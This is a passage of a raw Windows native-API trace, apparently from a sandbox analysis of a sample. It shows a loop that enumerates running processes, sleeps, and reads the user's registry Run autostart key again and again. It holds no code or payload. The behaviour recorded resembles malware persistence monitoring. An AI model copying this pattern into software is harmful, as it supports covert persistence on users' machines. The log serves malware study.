Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.099] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.099] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.101] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.102] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.113] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.113] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.113] NtClose (Handle=0x154) returned 0x0 [0183.113] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.117] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.117] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.129] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.129] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.129] NtClose (Handle=0x154) returned 0x0 [0183.129] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.130] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.133] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.133] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.146] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.146] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.146] NtClose (Handle=0x154) returned 0x0 [0183.146] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.147] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.150] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.150] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.160] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.160] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.160] NtClose (Handle=0x154) returned 0x0 [0183.160] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.161] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.161] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.164] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.164] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.178] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.178] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.178] NtClose (Handle=0x154) returned 0x0 [0183.178] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.179] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.179] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.180] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.182] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.182] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.191] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.191] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.191] NtClose (Handle=0x154) returned 0x0 [0183.191] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.192] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.195] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.195] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.216] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.216] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.216] NtClose (Handle=0x154) returned 0x0 [0183.216] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.220] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.222] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.222] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.222] NtClose (Handle=0x154) returned 0x0 [0183.222] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.223] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.223] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.225] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.226] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.238] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.238] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.238] NtClose (Handle=0x154) returned 0x0 [0183.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.242] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.256] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.256] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.257] NtClose (Handle=0x154) returned 0x0 [0183.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.258] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.260] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.260] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.269] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.269] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.269] NtClose (Handle=0x154) returned 0x0 [0183.269] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.270] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.273] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.286] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.287] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.287] NtClose (Handle=0x154) returned 0x0 [0183.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.288] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.290] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.290] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.300] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.301] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.301] NtClose (Handle=0x154) returned 0x0 [0183.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.302] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.302] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.304] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.305] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.318] NtCreateKey (in: 